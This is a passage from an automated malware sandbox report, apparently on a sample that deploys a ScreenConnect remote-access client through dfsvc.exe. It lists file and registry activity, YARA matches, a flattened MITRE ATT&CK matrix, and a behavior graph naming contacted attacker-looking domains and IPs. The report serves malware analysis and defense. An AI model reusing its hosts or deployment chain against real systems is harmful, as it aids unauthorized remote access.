                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00761807
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 4.0.ScreenConnect.WindowsClient.exe.350000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1496898405.000000000270A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2709412544.000002728031A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 6956, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7040, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Windows Service                  		1
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager14
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Timestomp                  		NTDS41
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit                  		1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking                  		Cached Domain Credentials41
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638406 Sample: SecuriteInfo.com.W32.Lolbas... Startdate: 14/03/2025 Architecture: WINDOWS Score: 51 35 variols.ephelp.site 2->35 37 p.djhelp.top 2->37 39 bg.microsoft.map.fastly.net 2->39 45 Multi AV Scanner detection for submitted file 2->45 47 .NET source code references suspicious native API functions 2->47 49 Detected potential unwanted application 2->49 51 Contains functionality to hide user accounts 2->51 10 SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe 2 2->10         started        signatures3 process4 process5 12 dfsvc.exe 133 106 10->12         started        16 WerFault.exe 10->16         started        dnsIp6 43 p.djhelp.top 172.67.152.68, 443, 49683, 49684 CLOUDFLARENETUS United States 12->43 27 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 12->27 dropped 29 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 12->29 dropped 31 ScreenConnect.WindowsBackstageShell.exe, PE32 12->31 dropped 33 13 other files (none is malicious) 12->33 dropped 18 ScreenConnect.WindowsClient.exe 19 13 12->18         started        file7 process8 dnsIp9 41 variols.ephelp.site 95.214.234.11, 49710, 8880 HondurasInternetSAHN Ukraine 18->41 53 Contains functionality to hide user accounts 18->53 22 ScreenConnect.ClientService.exe 2 2 18->22         started        signatures10 process11 signatures12 55 Contains functionality to hide user accounts 22->55 57 Reads the Security eventlog 22->57 59 Reads the System eventlog 22->59 25 WerFault.exe 22 16 22->25         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.